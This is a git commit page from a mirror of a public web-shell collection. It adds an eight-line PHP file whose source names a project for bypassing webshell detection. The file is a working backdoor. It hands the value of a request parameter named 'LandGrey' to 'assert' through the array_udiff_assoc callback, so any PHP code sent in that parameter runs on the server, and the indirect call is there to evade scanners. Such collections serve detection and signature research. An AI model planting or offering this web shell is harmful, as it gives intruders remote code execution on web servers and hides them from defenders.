mirror of
https://github.com/tennc/webshell.git
synced 2025-12-24 08:39:02 +00:00
Add files via upload
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
This commit is contained in:
8
php/array_udiff_assoc.php
Normal file
8
php/array_udiff_assoc.php
Normal file
@@ -0,0 +1,8 @@
|
||||
<?php
|
||||
/**
|
||||
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
||||
*
|
||||
*/
|
||||
$password = "LandGrey";
|
||||
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
|
||||
?>
|
||||
Reference in New Issue
Block a user